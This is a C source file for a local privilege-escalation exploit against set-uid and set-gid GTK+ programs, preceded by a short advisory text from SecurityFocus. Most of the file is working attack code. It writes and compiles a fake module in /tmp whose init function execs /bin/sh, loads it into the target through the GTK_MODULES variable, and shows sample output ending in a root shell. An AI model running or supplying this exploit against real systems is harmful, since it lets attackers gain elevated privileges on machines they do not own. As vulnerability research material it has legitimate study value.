
// source: https://www.securityfocus.com/bid/2165/info
GTK+ is the Gimp Toolkit, freely available to the public and maintained by the GTK Development Team. A problem exists in the Gimp Toolkit that could allow a local user to gain elevated privileges.
The problem occurs in the ability to load modules with the GTK_MODULES environment variable. Through this variable it is possible to specify the path to a module that is not part of the GTK+ package, so a custom-crafted shared object can be loaded by the toolkit. Once loaded, the module's initialization code is executed in the context of the program that loaded it; when that program is set-user-ID or set-group-ID, the module runs with the program's elevated effective privileges. This makes it possible for a malicious local user to gain elevated privileges, overwrite system files, or execute arbitrary and potentially dangerous code.
/* (*)gtk+[v*] local module exploit, by v9[v9@fakehalo.org]. this will give
you the euid/egid of a set*id program that uses gtk+. it works through the
GTK_MODULES environment variable: gtk+ loads whatever module that variable
names and calls its gtk_module_init(), so a bogus module gets to run
arbitrary functions/commands with the set*id program's privileges.

example(./xgtk):
-------------------------------------------------------------------------------
# ls -l /usr/bin/X11/gtk_program
-rwxr-sr-x 1 root tty 437625 Oct 23 1999 /usr/bin/X11/gtk_program
# cc xgtk.c -o xgtk
# ./xgtk /usr/bin/X11/gtk_program :0.0
[ (*)gtk+[v*] local module exploit, by v9[v9@fakehalo.org]. ]
[ program: /usr/bin/X11/gtk_program(->/bin/sh), display: :0.0. ]

[*] making module for gtk+ to execute. (/tmp/gtkm.c)
[*] done, compiling module source file. (/tmp/gtkm.c->/tmp/gtkm.so)
[*] done, checking to see if the module comiled. (/tmp/gtkm.so)
[*] done, setting up the environment. (module&display)
[*] done, executing /usr/bin/X11/gtk_program, the module should load now.
[*] success, module loaded successfully.
[*] id stats: uid: 0, euid: 0, gid: 0, egid: 5.
[*] now executing: /bin/sh.
#
-------------------------------------------------------------------------------

note: this requires a valid X display to exploit successfully, presumably
because the target needs an X connection before gtk+ gets as far as loading
modules. it was only tested against one gtk+ version; other versions that
honour GTK_MODULES are presumably affected too, but that is untested.
*/

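/* setenv(), fdopen() and friends are POSIX, not ISO C; ask for them. */
#define _POSIX_C_SOURCE 200809L

#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

#define GCCPATH "/usr/bin/gcc" /* compiler used to build the fake module */
#define SRCFILE "/tmp/gtkm.c"  /* source of the fake module, written by us */
#define MODEXEC "/tmp/gtkm.so" /* compiled fake module, named in GTK_MODULES */
#define DISPLAY ":0.0"         /* default X display; argv[2] overrides it */
#define EXECUTE "/bin/sh"      /* program the module exec()s once loaded */

/*
 * NOTE(review): SRCFILE and MODEXEC are fixed names in world-writable /tmp,
 * so another local user can plant a file or symlink there first.  The
 * source is created with O_EXCL below, which refuses such a plant, but gcc
 * still writes MODEXEC by name, so that window is narrowed rather than
 * closed; a private mkdtemp() directory would close it completely.
 */

/* Best-effort removal of both temporary files; errors are ignored. */
static void remove_temp_files(void)
{
    unlink(SRCFILE);
    unlink(MODEXEC);
}

/*
 * Write the fake module source to SRCFILE.  Its gtk_module_init() deletes
 * the two temporary files, prints the credentials it is running with and
 * exec()s EXECUTE.  Returns 0 on success, -1 after printing a diagnostic.
 */
static int write_module_source(void)
{
    /* O_EXCL: fail instead of following a pre-planted file or symlink. */
    int fd = open(SRCFILE, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0) {
        fprintf(stderr, "[!] failed, cannot create %s: %s\n", SRCFILE,
                strerror(errno));
        return -1;
    }
    FILE *source = fdopen(fd, "w");
    if (source == NULL) {
        fprintf(stderr, "[!] failed, cannot open %s: %s\n", SRCFILE,
                strerror(errno));
        close(fd);
        return -1;
    }
    fprintf(source, "#include <stdio.h>\n");
    fprintf(source, "#include <unistd.h>\n");
    /* GTK+ calls gtk_module_init() with (argc, argv) pointers; both are
     * ignored here.  A full prototype avoids relying on a K&R "()". */
    fprintf(source, "void gtk_module_init(int *argc, char ***argv){\n");
    fprintf(source, " (void)argc; (void)argv;\n");
    fprintf(source, " unlink(\"%s\");\n", SRCFILE);
    fprintf(source, " unlink(\"%s\");\n", MODEXEC);
    fprintf(source, " fprintf(stderr,\"[*] success, module loaded successfully.\\n"
                    "\");\n");
    /* uid_t is unsigned on glibc; cast so %d is a correct specifier. */
    fprintf(source, " fprintf(stderr,\"[*] id stats: uid: %%d, euid: %%d, gid: %%d"
                    ", egid: %%d.\\n\",(int)getuid(),(int)geteuid(),(int)getgid(),"
                    "(int)getegid());\n");
    fprintf(source, " fprintf(stderr,\"[*] now executing: %s.\\n\");\n", EXECUTE);
    /* execl() needs a real null pointer as the terminator, not a bare 0. */
    fprintf(source, " execl(\"%s\",\"%s\",(char *)0);\n", EXECUTE, EXECUTE);
    fprintf(source, "}\n");
    if (fclose(source) != 0) {
        fprintf(stderr, "[!] failed, cannot write %s: %s\n", SRCFILE,
                strerror(errno));
        return -1;
    }
    return 0;
}

/*
 * Build SRCFILE into the shared object MODEXEC with GCCPATH.  -fPIC is
 * required for a loadable object on 64-bit hosts and harmless elsewhere.
 * Returns 0 if the compiler exited successfully, -1 otherwise.
 */
static int compile_module(void)
{
    char syscmd[512];
    int n = snprintf(syscmd, sizeof syscmd,
                     "%s -shared -fPIC -o %s %s 1>/dev/null 2>&1",
                     GCCPATH, MODEXEC, SRCFILE);
    if (n < 0 || (size_t)n >= sizeof syscmd)
        return -1;
    /* system() is acceptable here: every part of the command line is a
     * compile-time constant, nothing from argv reaches the shell. */
    return system(syscmd) == 0 ? 0 : -1;
}

/*
 * Usage: xgtk </path/to/program> [display]
 *
 * Builds the fake module, exports GTK_MODULES/DISPLAY and exec()s the
 * set*id GTK+ program named by argv[1].  On success execl() replaces this
 * process and main() never returns; every failure path removes the
 * temporary files and returns EXIT_FAILURE.
 */
int main(int argc, char **argv)
{
    char cmd[256], display[256];
    struct stat st;

    fprintf(stderr, "[ (*)gtk+[v*] local module exploit, by v9[v9@fakehalo.org]. ]"
                    "\n");
    if (argc < 2) {
        fprintf(stderr, "[!] syntax: %s </path/to/program> [display]\n", argv[0]);
        return EXIT_FAILURE;
    }
    /* snprintf rather than strncpy: the copy is always NUL-terminated, and
     * an over-long argument is rejected instead of silently truncated. */
    if ((size_t)snprintf(cmd, sizeof cmd, "%s", argv[1]) >= sizeof cmd) {
        fprintf(stderr, "[!] failed, program path is too long.\n");
        return EXIT_FAILURE;
    }
    const char *want_display = argc > 2 ? argv[2] : DISPLAY;
    if ((size_t)snprintf(display, sizeof display, "%s", want_display)
            >= sizeof display) {
        fprintf(stderr, "[!] failed, display name is too long.\n");
        return EXIT_FAILURE;
    }
    if (stat(cmd, &st)) {
        fprintf(stderr, "[!] failed, %s doesn't seem to exist. (path needed)\n", cmd);
        return EXIT_FAILURE;
    }
    if (stat(GCCPATH, &st)) {
        fprintf(stderr, "[!] failed, %s compiler doesn't seem to exist.\n", GCCPATH);
        return EXIT_FAILURE;
    }
    fprintf(stderr, "[ program: %s(->%s), display: %s. ]\n\n", cmd, EXECUTE, display);

    fprintf(stderr, "[*] making module for gtk+ to execute. (%s)\n", SRCFILE);
    remove_temp_files();
    if (write_module_source() != 0) {
        remove_temp_files();
        return EXIT_FAILURE;
    }

    fprintf(stderr, "[*] done, compiling module source file. (%s->%s)\n", SRCFILE,
            MODEXEC);
    int compiled = compile_module();
    fprintf(stderr, "[*] done, checking to see if the module comiled. (%s)\n",
            MODEXEC);
    /* Check both the compiler's exit status and that the object exists. */
    if (compiled != 0 || stat(MODEXEC, &st)) {
        fprintf(stderr, "[!] failed, %s was not compiled properly. (gcc failed)\n",
                MODEXEC);
        remove_temp_files();
        return EXIT_FAILURE;
    }

    fprintf(stderr, "[*] done, setting up the environment. (module&display)\n");
    if (setenv("GTK_MODULES", MODEXEC, 1) != 0 ||
        setenv("DISPLAY", display, 1) != 0) {
        fprintf(stderr, "[!] failed, cannot set up the environment: %s\n",
                strerror(errno));
        remove_temp_files();
        return EXIT_FAILURE;
    }

    fprintf(stderr, "[*] done, executing %s, the module should load now.\n", cmd);
    execl(cmd, cmd, (char *)0);
    /* execl() only returns on failure. */
    fprintf(stderr, "[!] failed, %s did not execute properly: %s\n", cmd,
            strerror(errno));
    remove_temp_files();
    return EXIT_FAILURE;
}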